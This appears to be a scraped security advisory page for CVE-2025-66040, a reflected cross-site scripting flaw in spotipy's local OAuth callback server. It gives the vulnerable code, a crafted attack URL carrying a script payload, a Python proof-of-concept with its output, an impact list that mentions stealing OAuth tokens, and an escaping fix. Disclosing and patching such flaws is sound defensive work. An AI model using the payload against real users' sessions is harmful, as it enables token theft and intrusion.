Authentication status: failed ()
\n\n\n\n[!] VULNERABLE: Payload '' reflected without escaping!\n```\n\n**The Proof:**\n- Expected (safe): `<script>alert(\"XSS\")</script>`\n- Actual (vulnerable): ``\n- The script tags are NOT escaped → XSS confirmed\n\n### Impact\n\n**Vulnerability Type:** Cross-Site Scripting (XSS) - CWE-79\n\n**Affected Users:** Anyone using spotipy's OAuth flow with localhost redirect URIs\n\n**Attack Complexity:** Medium-High\n- Requires timing (during brief OAuth window)\n- Localhost-only (127.0.0.1)\n- Requires user interaction (click malicious link)\n\n**Potential Impact:**\n- Execute JavaScript in localhost origin\n- Access other localhost services (port scanning, API calls)\n- Steal data from local web applications\n- Extract OAuth tokens from browser storage\n- Bypass CSRF protections on localhost endpoints\n\n**CVSS 3.1 Score:** 4.2 (Medium)\n- Attack Vector: Local\n- Attack Complexity: High\n- Privileges Required: None\n- User Interaction: Required\n- Scope: Unchanged\n- Confidentiality/Integrity: Low\n\n\n**Recommended Fix:**\n```python\nimport html\n\n# Line 1255 - apply HTML escaping\nif self.server.error:\n status = f\"failed ({html.escape(str(self.server.error))})\"\n```","inLanguage":"en","url":"https://vulnscope.dev/en/cve/CVE-2025-66040","author":{"@type":"Organization","name":"VulnScope","url":"https://vulnscope.dev"},"publisher":{"@type":"Organization","name":"VulnScope","url":"https://vulnscope.dev"},"about":{"@type":"Thing","name":"CVE-2025-66040","identifier":"CVE-2025-66040","additionalProperty":[{"@type":"PropertyValue","name":"CVSS","value":3.6},{"@type":"PropertyValue","name":"EPSS","value":0.00019},{"@type":"PropertyValue","name":"KEV","value":false}]}}CVE-2025-66040
Spotipy has a XSS vulnerability in its OAuth callback server
Description
### Summary XSS vulnerability in OAuth callback server allows JavaScript injection through unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication. ### Details **Vulnerable Code:** `spotipy/oauth2.py` lines 1238-1274 (RequestHandler.do_GET) **The Problem:** During OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the `error` URL parameter directly into HTML without sanitization. **Vulnerable code at line 1255:** ```python status = f"failed ({self.server.error})" ``` **Then embedded in HTML at line 1265:** ```python self._write(f"""<html> <body> <h1>Authentication status: {status}</h1> </body> </html>""") ``` The `error` parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection. **Attack Flow:** 1. User starts OAuth authentication → local server runs on `http://127.0.0.1:8080` 2. Attacker crafts malicious URL: `http://127.0.0.1:8080/?error=<script>alert(1)</script>&state=x` 3. User visits URL → JavaScript executes in localhost origin ### PoC **Simple Python Test:** ```python #!/usr/bin/env python3 # poc_xss.py - Demonstrates XSS in spotipy OAuth callback import requests from spotipy.oauth2 import start_local_http_server import threading import time # Start vulnerable server in background def start_server(): server = start_local_http_server(8080) server.handle_request() thread = threading.Thread(target=start_server, daemon=True) thread.start() time.sleep(2) # Send XSS payload payload = '<script>alert("XSS")</script>' url = f'http://127.0.0.1:8080/?error={payload}&state=test' response = requests.get(url) print(f"Status: {response.status_code}") print(f"\nHTML Response:\n{response.text}") # Check if vulnerable if payload in response.text: print(f"\n[!] VULNERABLE: Payload '{payload}' reflected without escaping!") else: print("\n[+] Safe: Payload was sanitized") ``` **Run it:** ```bash pip install spotipy requests python3 poc_xss.py ``` **Output shows:** ``` Status: 200 HTML Response: <html> <body> <h1>Authentication status: failed (<script>alert("XSS")</script>)</h1> </body> </html> [!] VULNERABLE: Payload '<script>alert("XSS")</script>' reflected without escaping! ``` **The Proof:** - Expected (safe): `<script>alert("XSS")</script>` - Actual (vulnerable): `<script>alert("XSS")</script>` - The script tags are NOT escaped → XSS confirmed ### Impact **Vulnerability Type:** Cross-Site Scripting (XSS) - CWE-79 **Affected Users:** Anyone using spotipy's OAuth flow with localhost redirect URIs **Attack Complexity:** Medium-High - Requires timing (during brief OAuth window) - Localhost-only (127.0.0.1) - Requires user interaction (click malicious link) **Potential Impact:** - Execute JavaScript in localhost origin - Access other localhost services (port scanning, API calls) - Steal data from local web applications - Extract OAuth tokens from browser storage - Bypass CSRF protections on localhost endpoints **CVSS 3.1 Score:** 4.2 (Medium) - Attack Vector: Local - Attack Complexity: High - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Confidentiality/Integrity: Low **Recommended Fix:** ```python import html # Line 1255 - apply HTML escaping if self.server.error: status = f"failed ({html.escape(str(self.server.error))})" ```